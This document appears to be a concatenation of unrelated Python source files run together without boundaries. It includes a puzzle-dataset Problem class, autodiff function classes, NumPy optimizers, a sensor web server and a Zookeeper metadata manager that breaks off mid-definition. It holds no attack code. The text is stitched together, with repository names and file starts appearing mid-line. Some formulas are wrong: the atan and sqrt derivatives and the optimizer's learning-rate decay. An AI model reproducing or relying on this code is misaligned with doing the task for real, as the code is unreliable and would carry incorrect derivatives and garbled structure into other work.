# You can run Uncat.get_example() to get the inputs, so you can then run # assert Uncat.sat(Uncat.sol(**Uncat.get_example())) class Uncat(Problem): """Simple example with inputs.""" @staticmethod def sat(st: str, a='world', b='Hello world'): return st + a == b @staticmethod def sol(a, b): return b[:len(b)-len(a)] def gen_random(self): b = self.random.pseudo_word() a = b[self.random.randrange(len(b)+1):] self.add({"a": a, "b": b}) ''' timeout = None # how long to run in seconds, default is 1.0 seconds if this is None @staticmethod def sat(ans, *other_inputs): # must override raise NotImplementedError @classmethod def get_example(cls): if not hasattr(cls, "_example"): p_spec = inspect.getfullargspec(cls.sat) if p_spec.defaults: cls._example = dict(zip(p_spec.args[-len(p_spec.defaults):], p_spec.defaults)) else: cls._example = {} cls._example_copy = deep_copy(cls._example) return cls._example @classmethod def subclass_descendents(cls): # finds all problems def descendents(cls): ans = [] for c in cls.__subclasses__(): if c is not DebugProblem: ans.append(c) ans.extend(descendents(c)) return ans ans = utils.dedup(descendents(cls)) names = set() for problem in ans: name = problem.__name__ assert name not in names, f"Duplicate problems named `{name}`" names.add(name) return ans @classmethod def debug_problems(cls, target_num_instances=None): defaults = {"target_num_instances": target_num_instances} if target_num_instances else {} debug_problems = DebugProblem.subclass_descendents() if debug_problems: for P in debug_problems: P().debug(**defaults) print(f"Problem.Debug problem(s) succeeded: {[p.__name__ for p in debug_problems]}") print("Next, remove the `Debug` from these `Problem.Debug` classes") else: all_problems = Problem.subclass_descendents() print("Suggestion for debugging: subclass Problem.Debug to test a single problem.") print(f"No Problem.Debug problems found, so testing {len(all_problems):,} problems:") for P in all_problems: P().test(**defaults) print(f"Success on all {len(all_problems):,} problem(s).") print("To make the dataset, run make_dataset.py") print("See https://github.com/microsoft/PythonProgrammingPuzzles/wiki/How-to-add-a-puzzle for more info.") def __init__(self, seed=_AI_SEED): self.name = self.__class__.__name__ assert self.sat is not Problem.sat, f"Must override {self.name}.sat" self.sat_src_spec = get_src_spec(self.sat) if not self.__doc__ or self.__doc__ == Problem.__doc__: self.desc = "" else: self.desc = unindent(self.__doc__) self.random = BuilderRandom(f"{seed} | {self.name}") self.instances = [] self._seen_problems = set() self._built_target = 0 self.build_time = None self._already_tested = None sol_names = [k for k in dir(self) if k.startswith("sol")] self.sols = [getattr(self, k) for k in sol_names] self.sol_src_specs = [get_src_spec(s) for s in self.sols] mro_dict = {} for mro in inspect.getmro(self.__class__)[::-1]: mro_dict.update(mro.__dict__) assert all(isinstance(mro_dict[k], staticmethod) for k in ["sat"] + sol_names), \ f"{self.name} `sat` and `sol` must be defined with @staticmethod" p_spec = self.sat_src_spec[1] self.arg_names = p_spec.args assert len(self.arg_names) > 0, f"{self.name}.problem() takes no arguments!" 
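        # For reference, get_example() above recovers the example inputs from sat's defaulted
        # parameters. A standalone sketch with a hypothetical sat (not one of the real puzzles):
        #
        #     import inspect
        #
        #     def sat(st: str, a="world", b="Hello world"):
        #         return st + a == b
        #
        #     spec = inspect.getfullargspec(sat)
        #     example = dict(zip(spec.args[-len(spec.defaults):], spec.defaults))
        #     assert example == {"a": "world", "b": "Hello world"}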
self.types = p_spec.annotations if self.sols: s_spec = self.sol_src_specs[0][1] assert self.arg_names[1:] == s_spec.args, \ f"mismatched problem/solution arguments for {self.name}" self.types.update(s_spec.annotations) assert set(self.arg_names[1:]) == set(self.get_example()), f"Bad {self.name} example" self.types.update({v: get_type(x) for v, x in self.get_example().items() if get_type(x, True)}) for v in self.arg_names: assert v in self.types, f"Cannot determine type of `{v}` in {self.name} -- no annotation/_example" def build(self, target_num_instances, already_tested={}, max_random_attempts=100, force_trivial_test=False): if self._built_target == target_num_instances: return self.check_for_trivial_solutions(force_trivial_test, already_tested) self._already_tested = already_tested self._seen_problems = set() self._built_target = target_num_instances self.random.reseed() self._tested = 0 self.instances = [] start_time = time.perf_counter() self.add(self.get_example()) if target_num_instances > 1: self.gen(target_num_instances) while len(self.instances) < target_num_instances: n = len(self.instances) for _ in range(max_random_attempts): self.gen_random() if n != len(self.instances): # added a problem break if len(self.instances) == n: # failed max_random_attempts, give up break if not self.instances: utils.error(f"{self.name} did not generate any problem instances") self.build_time = time.perf_counter() - start_time self._already_tested = None assert self._example_copy == self._example, f"Puzzle {self.name} changed inputs" if self._tested: utils.info(f"Tested {self._tested} instances of {self.name}") def check_for_trivial_solutions(self, force, already_tested): # check for trivial solutions example = self.get_example() src = inject_into_src(*self.sat_src_spec, "sat", example, self.types, add_type_assertion=True) if (not force and src in already_tested) or not hasattr(self, "sol"): return utils.info(f"Checking for trivial solutions to {self.name}") time0 = time.perf_counter() ans = self.sol(**example) if type(ans) == int: if ans in range(-1000, 1000): tests = [ans] else: tests = [] elif type(ans) == str: if len(ans) <= 1: tests = [ans] else: tests = ["cat", "dog", "aa", "ab", "foo", "bar", "baz"] elif type(ans) == float: tests = [-100.0, -10.0, -2.0, -1.0, -0.5, -0.1, 0.0, 0.1, 0.5, 1.0, 2.0, 10.0, 100.0] elif type(ans) == bool: tests = [True, False] elif type(ans) == list or type(ans) == set: if len(ans) == 0: tests = [ans] else: el = list(ans)[0] if type(el) == int: base = list(range(-3, 4)) elif type(el) == str: base = ["a", "b", "foo", "bar", "baz"] elif type(el) == bool: base = [True, False] elif type(el) == float: base = [-1.0, -0.1, 0.0, 0.1, 0.5, 1.0, 2.0] else: # print(f"Can't create trivial instances fitting pattern `{ans}`"[:1000]) base = [] from itertools import product tests = [] for r in range(6): tests.extend(type(ans)(p) for p in product(base, repeat=r)) else: print(f"Can't check for types, unexpected type `{type(ans)}`") tests = [] for t in tests: try: assert self.sat(t, **example) except: continue utils.warn(f"`{self.name}` in file `{self.__module__.split('.')[-1]}` " f"has trivial solution `{t}`") break dur = time.perf_counter() - time0 if dur > (self.timeout or 1.0): utils.warn(f"Took {dur:.1f}s to test for trivial solutions to `{self.name}`") def gen(self, target_num_instances): pass def gen_random(self): pass def check_seen_input(self, inp): """ Returns True if the input is a duplicate of a previous puzzle, and also makes sure that the types match """ s = str(inp) if 
s in self._seen_problems: return True # duplicate problem self._seen_problems.add(s) assert set(inp) == set(self.arg_names[1:]), \ f"Instance #{len(self.instances)} keys mismatch in {self.name}" for v in inp: assert get_type(inp[v], ignore_errors=True) in (None, self.types[v]), \ f"Instance #{len(self.instances)} variable `{v}` type mismatch in {self.name}" return False def add(self, inp: dict, test=True): if self.check_seen_input(inp): return # don't add duplicate problems instance = Instance( inject_into_src(*self.sat_src_spec, "sat", inp, self.types, add_type_assertion=True), f"{self.name}_{len(self.instances)}", timeout=self.timeout ) if test: for s, (sol_src, sol_spec) in zip(self.sols, self.sol_src_specs): sol_src = inject_into_src(sol_src, sol_spec, "sol", inp) if instance.src in self._already_tested and sol_src in self._already_tested[instance.src]: instance.add_test(sol_src, run_test=False) else: try: instance.add_test(sol_src, run_test=True) self._tested += 1 except Exception: # failed to pass test, rerun test without for debugging with normal exception assert self.sat(s(**inp), **inp) is True, f"Puzzle {self.name} didn't return True on `{inp}`" utils.error("Strange, failed test in exec but passed without exec") raise self.instances.append(instance) def test(self, target_num_instances=100): self.build(target_num_instances, force_trivial_test=True) class DebugProblem(Problem): """ A useful class for creating a debugging problems. Any DebugProblem will be run before any other problems. The program will exit if it successful. """ # def __init__(self): # print("ho") # super().__init__() def add(self, inp: dict, test=True): if self.check_seen_input(inp): return # don't add duplicate problems if test: var_name = self.sat_src_spec[1].args[0] type_assertion_str = gen_type_assertion(var_name, self.types[var_name]) for s in self.sols: answer = s(**inp) exec(type_assertion_str, {var_name: answer}) assert self.sat(answer, **inp) is True, f"Puzzle {self.name} didn't return True on `{inp}`" self.instances.append(("DEBUG TEST", bool(test and self.sols))) # for counting purposes def debug(self, target_num_instances=10000): print(f"Debugging {self.name}") self.build(target_num_instances, force_trivial_test=True) solved = sum(i[1] for i in self.instances) dur = self.build_time utils.info(f"Tested {solved:,}/{len(self.instances):,} instances of " f"({self.name}: DebugProblem) in {dur:0.2f}s") Problem.Debug = DebugProblem def remove_type_assertion(src: str): lines = src.split("\n") assert lines[1].strip().startswith("assert type") lines.pop(1) return "\n".join(lines) def get_src_spec(f: Callable): try: src = inspect.getsource(f) spec = inspect.getfullargspec(f) except OSError: utils.error("Cannot use inspect, happens in some interpreters... 
Try running in ipython.") raise de_indent = min([len(line) - len(line.lstrip(" ")) for line in src.splitlines() if line.strip()]) src = "\n".join([line[de_indent:] for line in src.splitlines()]).strip() if src.startswith("@staticmethod"): src = src[len("@staticmethod"):].strip() assert src.startswith("def ") return src, spec def inject_into_src(src, spec, new_function_name=None, defaults={}, types={}, add_type_assertion=False): if spec.defaults: # combine defaults, with defaults over-riding spec.defaults defaults = {**dict(zip(spec.args[-len(spec.defaults):], spec.defaults)), **defaults} assert all(var in spec.args for var in defaults), f"Defaults {defaults} not all in spec.args" for v, t in spec.annotations.items(): assert v not in types or types[v] == t, f"Annotation mismatch in {src}" types = {**spec.annotations, **types} func_name = (new_function_name or src[4:src.index('(')]) arg_st = ", ".join([var + (f": {type_str(types[var])}" if var in types else "") + (f"={utils.stringify(defaults[var])}" if var in defaults else "") for var in spec.args]) ans = f'def {func_name}({arg_st}):' if add_type_assertion: assert func_name == "sat" indent = min([len(line) - len(line.lstrip(" ")) for line in src.splitlines() if line.strip() and line.startswith(" ")]) ans += "\n" + " " * indent + gen_type_assertion(spec.args[0], types[spec.args[0]]) ans += src[src.index("):") + 2:] return ans def get_func_name(src): assert src.startswith("def ") return src[4:src.index("(")] def save_readme(problem_sets, filename=os.path.join(PATH, "README.md")): top = """# Python Programming Puzzles: dataset summary This document summarizes the dataset stored in .json files. Each .json file contains a number of related problems with one or more puzzles each. (Each puzzle in the json files contains an assert statement on its first line ensuring that the input is of the correct type---these assertions have been removed below for readability.) The only import required for puzzles is: ```from typing import List, Set, Dict``` ## Files: {} ---- """ table = "" content = "" tot_probs = 0 tot_instances = 0 for ps in problem_sets: section = "" sec_name = ps.name.split(".")[-1] section += f"## {sec_name}\n\n" section += f"{ps.summary}\n\n" n = len(ps.problems) link = f"[{sec_name}](#{sec_name.lower().replace(' ', '-')})" section += "[^ Top](#files)\n\n" n_instances = sum(len(p.instances) for p in ps.problems) tot_probs += len(ps.problems) tot_instances += n_instances table += f"- [{sec_name} ({len(ps.problems):,} problems, {n_instances:,} instances)](#{sec_name.lower().replace(' ', '-')})\n" for i, problem in enumerate(ps.problems): section += f"### {problem.name}\n({link} {i + 1:,}/{n:,})\n\n" section += f"**Description:**\n{problem.desc}\n\n" section += f"**Problem:**\n\n```python\n{remove_type_assertion(problem.instances[0].src)}\n```\n" if len(problem.instances[0].sol_srcs) > 0: section += "
<details><summary>Reveal solution(s):</summary>\n\n" for sol in problem.instances[0].sol_srcs: section += f"```python\n{sol}\n```\n\n" section += "</details>
\n\n" # section += f"[^ Back](#{sec_name.lower().replace(' ', '-')})\n\n" # Replaced with link in the header section += "[^^ Top](#files)\n" content += section table += f"\nTotal ({tot_probs:,} problems, {tot_instances:,} instances)\n" content = top.format(table) + content with open(filename, "w", encoding='utf8') as f: f.write(content) 0 import tensorflow as tf @tf.function(experimental_relax_shapes=True) def error(true, pred): return tf.math.abs(tf.math.subtract(true, pred)) extract_distinct_frames/__init__.py #!/usr/bin/env python # -*- coding: utf-8 -*- """ This script allows the extraction of the distinct frames in a video file or a youtube video. """ __version__ = "1.1" name = "extract_distinct_frames" from genericdiff.generic_diff import * import math class sin(GenericDiff): def __init__(self, obj): def _sin_generic(obj): self.val = math.sin(obj.val) self.der = math.cos(obj.val)*obj.der try: _sin_generic(obj) except AttributeError: obj = Constant(obj) _sin_generic(obj) class cos(GenericDiff): def __init__(self, obj): def _cos_generic(obj): self.val = math.cos(obj.val) self.der = -math.sin(obj.val)*obj.der try: _cos_generic(obj) except AttributeError: obj = Constant(obj) _cos_generic(obj) class tan(GenericDiff): def __init__(self, obj): def _tan_generic(obj): self.val = math.tan(obj.val) self.der = obj.der/(math.cos(obj.val)**2.0) try: _tan_generic(obj) except AttributeError: obj = Constant(obj) _tan_generic(obj) class sinh(GenericDiff): def __init__(self, obj): def _sinh_generic(obj): self.val = math.sinh(obj.val) self.der = math.cosh(obj.val) * obj.der try: _sinh_generic(obj) except AttributeError: obj = Constant(obj) _sinh_generic(obj) class cosh(GenericDiff): def __init__(self, obj): def _cosh_generic(obj): self.val = math.cosh(obj.val) self.der = math.sinh(obj.val) * obj.der try: _cosh_generic(obj) except AttributeError: obj = Constant(obj) _cosh_generic(obj) class tanh(GenericDiff): def __init__(self, obj): def _tanh_generic(obj): self.val = math.tanh(obj.val) self.der = obj.der/(math.cosh(obj.val)**2.0) try: _tanh_generic(obj) except AttributeError: obj = Constant(obj) _tanh_generic(obj) class acos(GenericDiff): def __init__(self, obj): def _acos_generic(obj): self.val = math.acos(obj.val) self.der = -obj.der/(math.sqrt(1.0 - obj.val**2.0)) try: _acos_generic(obj) except AttributeError: obj = Constant(obj) _acos_generic(obj) class asin(GenericDiff): def __init__(self, obj): def _asin_generic(obj): self.val = math.asin(obj.val) self.der = obj.der/(math.sqrt(1.0 - obj.val**2.0)) try: _asin_generic(obj) except AttributeError: obj = Constant(obj) _asin_generic(obj) class atan(GenericDiff): def __init__(self, obj): def _atan_generic(obj): self.val = math.atan(obj.val) self.der = obj.der / (math.sqrt(1.0 + obj.val ** 2.0)) try: _atan_generic(obj) except AttributeError: obj = Constant(obj) _atan_generic(obj) #exponential for base e class exp(GenericDiff): def __init__(self, obj): def _exp_generic(obj): self.val = math.exp(obj.val) if obj.der == 0: self.der = 0 else: self.der = math.exp(obj.val)*obj.der try: _exp_generic(obj) except AttributeError: obj = Constant(obj) _exp_generic(obj) # will handle any base with default = e class log(GenericDiff): def __init__(self, obj, base=math.e): def _log_generic(obj): self.val = math.log(obj.val, base) if obj.der == 0: self.der = 0 else: self.der = obj.der/(obj.val*math.log(base)) try: _log_generic(obj) except AttributeError: obj = Constant(obj) _log_generic(obj) #logistic function class logit(GenericDiff): def __init__(self, obj): def 
_logit_generic(obj): self.val = math.exp(obj.val)/(1+math.exp(obj.val)) self.der = (1+math.exp(-obj.val))**(-2)*(math.exp(-obj.val))*(-obj.der) try: _logit_generic(obj) except AttributeError: obj = Constant(obj) _logit_generic(obj) #sqrt function class sqrt(GenericDiff): def __init__(self, obj, base=math.e): def _sqrt_generic(obj): if obj.val <= 0: raise ValueError("Cannot take the derivative for sqrt of 0 or negative number.\n\ This package only outputs real numbers.") self.val = math.sqrt(obj.val) if obj.der == 0: self.der = 0 else: self.der = 1/(2*math.sqrt(obj.val)*obj.der) try: _sqrt_generic(obj) except AttributeError: obj = Constant(obj) _sqrt_generic(obj) huangyuyao/bevutils from ..registry import LOSSES import torch.nn.functional as F @LOSSES.register def nll_loss(output, target): return F.nll_loss(output, target)import copy import numpy as np from .initializations import _zero class Optimizer(object): def __init__(self, lr=0.001, clip=-1, decay=0., lr_min=0., lr_max=np.inf): self.lr = lr self.clip = clip self.decay = decay self.lr_min = lr_min self.lr_max = lr_max self.iterations = 0 def update(self, params, grads): self.iterations += 1 self.lr *= (1. / 1 + self.decay * self.iterations) self.lr = np.clip(self.lr, self.lr_min, self.lr_max) def __str__(self): return self.__class__.__name__ class SGD(Optimizer): def __init__(self, *args, **kwargs): super(SGD, self).__init__(*args, **kwargs) def update(self, params, grads): for p, g in zip(params, grads): p -= self.lr * npdl_clip(g, self.clip) super(SGD, self).update(params, grads) class Momentum(Optimizer): def __init__(self, momentum=0.9, *args, **kwargs): super(Momentum, self).__init__(*args, **kwargs) self.momentum = momentum self.velocity = None def update(self, params, grads): # init the velocities if self.velocity is None: self.velocity = [_zero(p.shape) for p in params] # update the parameters for i, (v, p, g) in enumerate(zip(self.velocity, params, grads)): v = self.momentum * v - self.lr * g p += v self.velocity[i] = v super(Momentum, self).update(params, grads) class NesterovMomentum(Optimizer): def __init__(self, momentum=0.9, *args, **kwargs): super(NesterovMomentum, self).__init__(*args, **kwargs) self.momentum = momentum self.velocity = None def update(self, params, grads): # init the velocities if self.velocity is None: self.velocity = [_zero(p.shape) for p in params] # update the parameters for i, (v, p, g) in enumerate(zip(self.velocity, params, grads)): v = self.momentum * v - self.lr * g p += (self.momentum * v - self.lr * g) self.velocity[i] = v super(NesterovMomentum, self).update(params, grads) class Adagrad(Optimizer): def __init__(self, epsilon=1e-6, *args, **kwargs): super(Adagrad, self).__init__(*args, **kwargs) self.epsilon = epsilon self.cache = None def update(self, params, grads): # init cache if self.cache is None: self.cache = [_zero(g.shape) for g in grads] # update parameters for i, (c, p, g) in enumerate(zip(self.cache, params, grads)): c += np.power(g, 2) p -= self.lr * g / (np.sqrt(c) + self.epsilon) self.cache[i] = c super(Adagrad, self).update(params, grads) class RMSprop(Optimizer): def __init__(self, rho=0.9, epsilon=1e-6, *args, **kwargs): super(RMSprop, self).__init__(*args, **kwargs) self.rho = rho self.epsilon = epsilon self.cache = None self.iterations = 0 def update(self, params, grads): # init cache if self.cache is None: self.cache = [_zero(p.shape) for p in params] # update parameters for i, (c, p, g) in enumerate(zip(self.cache, params, grads)): c = self.rho * c + (1 - self.rho) * 
np.power(g, 2) p -= (self.lr * g / np.sqrt(c + self.epsilon)) self.cache[i] = c class Adadelta(Optimizer): def __init__(self, rho=0.9, epsilon=1e-6, *args, **kwargs): super(Adadelta, self).__init__(*args, **kwargs) self.rho = rho self.epsilon = epsilon self.cache = None self.delta = None def update(self, params, grads): # init cache and delta if self.cache is None: self.cache = [_zero(p.shape) for p in params] if self.delta is None: self.delta = [_zero(p.shape) for p in params] # update parameters for i, (c, d, p, g) in enumerate(zip(self.cache, self.delta, params, grads)): c = self.rho * c + (1 - self.rho) * np.power(g, 2) update = g * np.sqrt(d + self.epsilon) / np.sqrt(c + self.epsilon) p -= self.lr * update d = self.rho * d + (1 - self.rho) * np.power(update, 2) self.cache[i] = c self.delta[i] = d class Adam(Optimizer): def __init__(self, beta1=0.9, beta2=0.999, epsilon=1e-8, *args, **kwargs): super(Adam, self).__init__(*args, **kwargs) self.beta1 = beta1 self.beta2 = beta2 self.epsilon = epsilon self.ms = None self.vs = None def update(self, params, grads): # init self.iterations += 1 a_t = self.lr * np.sqrt(1 - np.power(self.beta2, self.iterations)) / \ (1 - np.power(self.beta1, self.iterations)) if self.ms is None: self.ms = [_zero(p.shape) for p in params] if self.vs is None: self.vs = [_zero(p.shape) for p in params] # update parameters for i, (m, v, p, g) in enumerate(zip(self.ms, self.vs, params, grads)): m = self.beta1 * m + (1 - self.beta1) * g v = self.beta2 * v + (1 - self.beta2) * np.power(g, 2) p -= a_t * m / (np.sqrt(v) + self.epsilon) self.ms[i] = m self.vs[i] = v class Adamax(Optimizer): def __init__(self, beta1=0.9, beta2=0.999, epsilon=1e-8, *args, **kwargs): super(Adamax, self).__init__(*args, **kwargs) self.beta1 = beta1 self.beta2 = beta2 self.epsilon = epsilon self.ms = None self.vs = None def update(self, params, grads): # init self.iterations += 1 a_t = self.lr / (1 - np.power(self.beta1, self.iterations)) if self.ms is None: self.ms = [_zero(p.shape) for p in params] if self.vs is None: self.vs = [_zero(p.shape) for p in params] # update parameters for i, (m, v, p, g) in enumerate(zip(self.ms, self.vs, params, grads)): m = self.beta1 * m + (1 - self.beta1) * g v = np.maximum(self.beta2 * v, np.abs(g)) p -= a_t * m / (v + self.epsilon) self.ms[i] = m self.vs[i] = v def npdl_clip(grad, boundary): if boundary > 0: return np.clip(grad, -boundary, boundary) else: return grad def get(optimizer): if optimizer.__class__.__name__ == 'str': if optimizer in ['sgd', 'SGD']: return SGD() if optimizer in ['momentum', 'Momentum']: return Momentum() if optimizer in ['nesterov_momentum', 'NesterovMomentum']: return NesterovMomentum() if optimizer in ['adagrad', 'Adagrad']: return Adagrad() if optimizer in ['rmsprop', 'RMSprop']: return RMSprop() if optimizer in ['adadelta', 'Adadelta']: return Adadelta() if optimizer in ['adam', 'Adam']: return Adam() if optimizer in ['adamax', 'Adamax']: return Adamax() raise ValueError('Unknown optimizer name: {}.'.format(optimizer)) elif isinstance(optimizer, Optimizer): return copy.deepcopy(optimizer) else: raise ValueError("Unknown type: {}.".format(optimizer.__class__.__name__)) dmitry-root/home-automation #!/usr/bin/env python3 # -*- coding: utf-8 -*- import os import sys from http.server import HTTPServer, SimpleHTTPRequestHandler import logging import json import threading import time sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../lib')) from pidev.monitor import SensorsMonitor from pidev.periodic import PeriodicTimer 
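# PeriodicMonitor below persists its JSON snapshots by writing to a temp file and then renaming it,
# so a crash mid-write cannot leave a truncated file behind (os.rename replaces the target
# atomically when both paths are on the same filesystem). A minimal sketch of that pattern
# (the helper name is illustrative and not used elsewhere in this script):
def _atomic_json_dump_sketch(data, path):
    tmp_path = path + '.tmp'
    with open(tmp_path, 'w') as fd:
        json.dump(data, fd, sort_keys=True, indent=4)
    os.rename(tmp_path, path)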
import pidev.config class PeriodicMonitor: _pers_interval = 60.0 * 60.0 # 1 hour def __init__(self, temp_file, pers_file, interval, config): self.temp_file = temp_file self.pers_file = pers_file self.interval = interval self._load() self._save_file(self.temp_file) self._timer = PeriodicTimer(self.interval, self._update) self._monitor = SensorsMonitor(config) self._lock = threading.Lock() def start(self): with self._lock: self._monitor.start() self._timer.start() self._time = time.clock_gettime(time.CLOCK_MONOTONIC) self._pers_time = self._time def stop(self): with self._lock: self._monitor.stop() self._timer.stop() def _load(self): if not self._load_file(self.temp_file): self._load_file(self.pers_file) self._data = {} self._data['temp'] = {} self._data['flow'] = {} self._data.setdefault('consumption', {}) def _load_file(self, file): try: with open(file) as fd: self._data = json.load(fd) except: return False return True def _save_file(self, file): tmp_file = file + '.tmp' try: with open(tmp_file, 'w') as fd: json.dump(self._data, fd, sort_keys=True, indent=4) os.rename(tmp_file, file) except: logging.error("failed to save data into file: '%s', error: '%s'" % (file, sys.exc_info()[0])) finally: try: os.unlink(tmp_file) except: pass def _update(self): with self._lock: self._do_update() def _do_update(self): now = time.clock_gettime(time.CLOCK_MONOTONIC) seconds_passed = now - self._time self._time = now data = self._monitor.collect(seconds_passed) self._data['temp'] = data.temp self._data['flow'] = data.flow for key, value in data.consumption.items(): self._data['consumption'].setdefault(key, 0.0) self._data['consumption'][key] += value self._save_file(self.temp_file) if now > self._pers_time + PeriodicMonitor._pers_interval: self._pers_time = now self._save_file(self.pers_file) if __name__ == '__main__': config = pidev.config.read('websensor.json') prefix = pidev.config.prefix() # Default configuration port = 8000 interval = 30.0 temp_dir = '/tmp/websensor' pers_dir = '/var/www/websensor' file = 'sensordata.json' if 'websensor' in config: wconfig = config['websensor'] try: port = int(wconfig.get('port', port)) interval = float(wconfig.get('interval', interval)) temp_dir = wconfig.get('temporary_directory', temp_dir) pers_dir = wconfig.get('persistent_directory', pers_dir) except: logging.error("error parsing websensor config: %s" % sys.exc_info()[0]) os.chdir(temp_dir) temp_file = temp_dir + '/' + file pers_file = pers_dir + '/' + file monitor = PeriodicMonitor(temp_file, pers_file, interval, config) server = HTTPServer(('', port), SimpleHTTPRequestHandler) logging.info("starting websensor at port: %d" % port) monitor.start() server.serve_forever() monitor.stop() logging.info("websensor stopped") """The InterUSS Platform Data Node storage API server. This flexible and distributed system is used to connect multiple USSs operating in the same general area to share safety information while protecting the privacy of USSs, businesses, operator and consumers. The system is focused on facilitating communication amongst actively operating USSs with no details about UAS operations stored or processed on the InterUSS Platform. A data node contains all of the API, logic, and data consistency infrastructure required to perform CRUD (Create, Read, Update, Delete) operations on specific grid cells. Multiple data nodes can be executed to increase resilience and availability. 
This is achieved by a stateless API to service USSs, an information interface to translate grid cell USS information into the correct data storage format, and an information consistency store to ensure data is up to date. This module is the information interface to Zookeeper. Copyright 2018 Google LLC Licensed under the Apache License, Version 2.0 (the 'License'); you may not use this file except in compliance with the License. You may obtain a copy of the License at https://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import json import logging # Our data structure for the actual metadata stored import uss_metadata # Utilties for validating slippy import slippy_util # Kazoo is the zookeeper wrapper for python from kazoo.client import KazooClient from kazoo.exceptions import KazooException from kazoo.exceptions import BadVersionError from kazoo.exceptions import NoNodeError from kazoo.exceptions import RolledBackError from kazoo.handlers.threading import KazooTimeoutError from kazoo.protocol.states import KazooState # logging is our log infrastructure used for this application logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.INFO) log = logging.getLogger('InterUSS_DataNode_InformationInterface') # CONSTANTS # Lock stores in this format /uss/gridcells/{z}/{x}/{y}/manifest USS_BASE_PREFIX = '/uss/gridcells/' TEST_BASE_PREFIX = '/test/' USS_METADATA_FILE = '/manifest' BAD_CHARACTER_CHECK = '\';(){}[]!@#$%^&*|"<>' CONNECTION_TIMEOUT = 2.5 # seconds DEFAULT_CONNECTION = 'localhost:2181' GRID_PATH = USS_BASE_PREFIX MAX_SAFE_INTEGER = 9007199254740991 class USSMetadataManager(object): """Interfaces with the locking system to get, put, and delete USS metadata. Metadata gets/stores/deletes the USS information for a partiular grid, including current version number, a list of USSs with active operations, and the endpoints to get that information. Locking is assured through a snapshot token received when getting, and used when putting. """ def __init__(self, connectionstring=DEFAULT_CONNECTION, testgroupid=None): """Initializes the class. Args: connectionstring: Zookeeper connection string - server:port,server:port,... 
testgroupid: ID to use if in test mode, none for normal mode """ if testgroupid: self.set_testmode(testgroupid) if not connectionstring: connectionstring = DEFAULT_CONNECTION log.debug('Creating metadata manager object and connecting to zookeeper...') try: if set(BAD_CHARACTER_CHECK) & set(connectionstring): raise ValueError self.zk = KazooClient(hosts=connectionstring, timeout=CONNECTION_TIMEOUT) self.zk.add_listener(self.zookeeper_connection_listener) self.zk.start() if testgroupid: self.delete_testdata(testgroupid) except KazooTimeoutError: log.error('Unable to connect to zookeeper using %s connection string...', connectionstring) raise except ValueError: log.error('Connection string %s seems invalid...', connectionstring) raise def __del__(self): log.debug('Destroying metadata manager object and disconnecting from zk...') self.zk.stop() def get_state(self): return self.zk.state def get_version(self): try: return True, self.zk.server_version() except KazooException as e: msg = str(e) return False, type(e).__name__ + (' ' + msg if msg else '') def set_verbose(self): log.setLevel(logging.DEBUG) def set_testmode(self, testgroupid='UNDEFINED_TESTER'): """Sets the mode to testing with the specific test ID, cannot be undone. Args: testgroupid: ID to use if in test mode, none for normal mode """ global GRID_PATH global CONNECTION_TIMEOUT # Adjust parameters specifically for the test GRID_PATH = TEST_BASE_PREFIX + testgroupid + USS_BASE_PREFIX log.debug('Setting test path to %s...', GRID_PATH) CONNECTION_TIMEOUT = 1.0 def zookeeper_connection_listener(self, state): if state == KazooState.LOST: # Register somewhere that the session was lost log.error('Lost connection with the zookeeper servers...') elif state == KazooState.SUSPENDED: # Handle being disconnected from Zookeeper log.error('Suspended connection with the zookeeper servers...') elif state == KazooState.CONNECTED: # Handle being connected/reconnected to Zookeeper log.info('Connection restored with the zookeeper servers...') def delete_testdata(self, testgroupid=None): """Removes the test data from the servers. Be careful when using this in parallel as it removes everything under the testgroupid, or everything if no tetgroupid is provided. Args: testgroupid: ID to use if in test mode, none will remove all test data """ if testgroupid: path = TEST_BASE_PREFIX + testgroupid else: path = TEST_BASE_PREFIX self.zk.delete(path, recursive=True) def get(self, z, x, y): """Gets the metadata and snapshot token for a GridCell. Reads data from zookeeper, including a snapshot token. The snapshot token is used as a reference when writing to ensure the data has not been updated between read and write. Args: z: zoom level in slippy tile format x: x tile number in slippy tile format y: y tile number in slippy tile format Returns: JSend formatted response (https://labs.omniti.com/labs/jsend) """ # TODO(hikevin): Change to use our own error codes and let the server # convert them to http error codes. For now, this is # at least in a standard JSend format. 
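    # For reference, the JSend payloads returned below look roughly like (values illustrative):
    #   success: {'status': 'success', 'sync_token': 12345, 'data': {...USS metadata...}}
    #   failure: {'status': 'fail', 'code': 404, 'message': 'Unable to pull metadata from lock system.'}
    # See _format_status_code_to_jsend() for the full code-to-message mapping.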
status = 500 if slippy_util.validate_slippy(z, x, y): (content, metadata) = self._get_raw(z, x, y) if metadata: try: m = uss_metadata.USSMetadata(content) status = 200 result = { 'status': 'success', 'sync_token': metadata.last_modified_transaction_id, 'data': m.to_json() } except ValueError: status = 424 else: status = 404 else: status = 400 if status != 200: result = self._format_status_code_to_jsend(status) return result def set(self, z, x, y, sync_token, uss_id, ws_scope, operation_format, operation_ws, earliest_operation, latest_operation): """Sets the metadata for a GridCell. Writes data, using the snapshot token for confirming data has not been updated since it was last read. Args: z: zoom level in slippy tile format x: x tile number in slippy tile format y: y tile number in slippy tile format sync_token: token retrieved in the original GET GridCellMetadata, uss_id: plain text identifier for the USS, ws_scope: scope to use to obtain OAuth token, operation_format: output format for operation ws (i.e. NASA, GUTMA), operation_ws: submitting USS endpoint where all flights in this cell can be retrieved from, earliest_operation: lower bound of active or planned flight timestamp, used for quick filtering conflicts. latest_operation: upper bound of active or planned flight timestamp, used for quick filtering conflicts. Returns: JSend formatted response (https://labs.omniti.com/labs/jsend) """ if slippy_util.validate_slippy(z, x, y): # first we have to get the cell (content, metadata) = self._get_raw(z, x, y) if metadata: # Quick check of the token, another is done on the actual set to be sure # but this check fails early and fast if str(metadata.last_modified_transaction_id) == str(sync_token): try: m = uss_metadata.USSMetadata(content) log.debug('Setting metadata for %s...', uss_id) if not m.upsert_operator(uss_id, ws_scope, operation_format, operation_ws, earliest_operation, latest_operation, z, x, y): log.error('Failed setting operator for %s with token %s...', uss_id, str(sync_token)) raise ValueError status = self._set_raw(z, x, y, m, metadata.version) except ValueError: status = 424 else: status = 409 else: status = 404 else: status = 400 if status == 200: # Success, now get the metadata back to send back result = self.get(z, x, y) else: result = self._format_status_code_to_jsend(status) return result def delete(self, z, x, y, uss_id): 